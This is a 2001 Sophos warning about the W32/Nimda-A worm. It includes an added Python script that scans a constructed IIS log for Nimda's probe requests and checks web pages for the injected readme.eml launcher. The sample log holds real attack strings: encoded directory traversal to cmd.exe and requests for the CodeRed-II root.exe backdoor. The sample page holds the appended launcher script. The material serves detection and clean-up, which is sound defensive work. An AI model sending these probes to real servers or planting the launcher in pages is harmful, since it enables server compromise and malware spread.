19 September 2001
Nimda virus spreading across the internet - Sophos warns of double-pronged attack
Sophos, a world leader in corporate anti-virus protection, is today warning users to be on their guard against a destructive new virus called W32/Nimda-A. Sophos has already received hundreds of reports of the virus in the wild.
Using a vulnerability in Microsoft's IIS web server software, the Nimda virus infects web servers and appends malicious code to the web pages they serve. Users who simply browse such a site can trigger the virus without their knowledge. The virus then mails itself to all addresses found on the user's computer. Infected e-mails carry the attachment README.EXE, and on systems with unpatched mail clients the attachment executes automatically when the message is viewed, without the user having to double-click on it.
"This virus is serious - you can get stung by browsing the internet or by opening an infected email," said Graham Cluley, senior technology consultant, Sophos Anti-Virus. "You can think of Nimda as combining the mechanisms of three existing viruses: CodeRed-II (which mounts an attack against unpatched web servers), Kakworm (which exploits unpatched mailers/browsers to run encoded files automatically), and Sircam (sends an email attachment and assumes that at least some users will click on it)."
Users with web servers compromised by Nimda are advised to restore all modified files from known-good copies and to carry out a full security audit. One of the exploits by which Nimda attacks servers relies on the backdoors left behind by a previous Troj/CodeRed-II infection, so any server that was never cleaned after CodeRed-II should be assumed vulnerable. Nimda itself tries to open additional security holes, such as adding the "Guest" user, which is supposed to be a highly restricted account, to the Administrators group; the audit should therefore include checking local group membership, not only the web content.
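The two checks below turn the advice above into something an administrator can run against an IIS log and the web root. They are an added illustration, not part of the Sophos utility described on this page. The first flags requests for the root.exe backdoor and drive-mapped cmd.exe left by CodeRed-II, and the encoded directory-traversal requests for cmd.exe that Nimda sends (the probe strings are the ones documented in CERT Advisory CA-2001-26); the second looks for the JavaScript snippet Nimda appends to web pages to open readme.eml. The log lines and page contents are constructed samples, the W3C extended log field layout is assumed, and a 200 status on a probe is read as "the server executed it".

```python
import re

# Constructed sample of an IIS 5.0 W3C extended log (not a real capture).
# The requests are the probe strings Nimda sends to each web server it scans.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 13:19:21 10.0.0.5 GET /scripts/root.exe /c+dir 200
2001-09-18 13:19:22 10.0.0.5 GET /MSADC/root.exe /c+dir 404
2001-09-18 13:19:23 10.0.0.5 GET /c/winnt/system32/cmd.exe /c+dir 404
2001-09-18 13:19:24 10.0.0.5 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 404
2001-09-18 13:19:25 10.0.0.5 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 13:20:01 10.0.0.7 GET /index.htm - 200
2001-09-18 13:20:03 10.0.0.7 GET /images/logo.gif - 200
"""

# Indicators, checked in order against cs-uri-stem:
#   root.exe               - the copy of cmd.exe CodeRed-II left as a backdoor
#   /c/ or /d/ ... cmd.exe - CodeRed-II's virtual directories mapped to C:\ and D:\
#   ..%xx ... cmd.exe      - encoded "../" (Unicode or double-decoded) reaching cmd.exe
NIMDA_INDICATORS = [
    ("codered2_backdoor", re.compile(r"/root\.exe$", re.I)),
    ("codered2_drive_mapping", re.compile(r"^/[cd]/winnt/system32/cmd\.exe$", re.I)),
    ("encoded_traversal_to_cmd", re.compile(r"\.\.%.*cmd\.exe$", re.I)),
]

# The script Nimda appends to .htm/.html/.asp files so a visiting browser opens
# readme.eml; matched loosely because whitespace and attributes vary.
INJECTED_SNIPPET = re.compile(
    r"<script[^>]*>\s*window\.open\(\s*[\"']readme\.eml[\"']", re.I)


def parse_iis_log(text):
    """Yield one dict per request, keyed by the names in the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) == len(fields):
            yield dict(zip(fields, values))


def find_nimda_probes(log_text):
    """Return a dict for every request whose URI matches a Nimda indicator."""
    hits = []
    for rec in parse_iis_log(log_text):
        stem = rec.get("cs-uri-stem", "")
        for name, pattern in NIMDA_INDICATORS:
            if pattern.search(stem):
                hits.append({
                    "when": f"{rec['date']} {rec['time']}",
                    "source": rec["c-ip"],
                    "indicator": name,
                    "uri": stem,
                    "status": rec.get("sc-status"),
                })
                break
    return hits


def answered_probes(hits):
    """Probes the server answered with 200: cmd.exe actually ran, so the host
    must be treated as compromised rather than merely scanned."""
    return [h for h in hits if h["status"] == "200"]


def page_is_infected(html):
    """True if a page carries the readme.eml launcher Nimda appends."""
    return INJECTED_SNIPPET.search(html) is not None


# Constructed page contents: a clean page and the same page after Nimda
# appended its launcher (the appended markup follows the original </html>).
CLEAN_PAGE = "<html><body><h1>Welcome</h1></body></html>\n"
INFECTED_PAGE = CLEAN_PAGE + (
    '<html><script language="JavaScript">window.open("readme.eml", null, '
    '"resizable=no,top=6000,left=6000")</script></html>'
)

if __name__ == "__main__":
    probes = find_nimda_probes(SAMPLE_IIS_LOG)
    for h in probes:
        print(f"{h['when']} {h['source']} {h['indicator']:26} {h['status']} {h['uri']}")
    print(f"{len(probes)} probe(s), {len(answered_probes(probes))} answered with 200")
    print("index page infected:", page_is_infected(INFECTED_PAGE))
```

A 404 on a probe means the scanning host tried and the hole was absent; a 200 means the command ran, and that server needs the clean-up and audit described above rather than just a patch. The traversal pattern is deliberately broad (any encoded `..` sequence that ends in cmd.exe) so it also catches the other encodings Nimda rotates through.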
Sophos researchers have developed a standalone utility which can detect and disinfect the W32/Nimda-A virus.
Download nimda.zip (utility and instructions, Zip file)
Download nimdasfx.exe (utility and instructions, self-extracting Zip file)
Read instructions for using the utility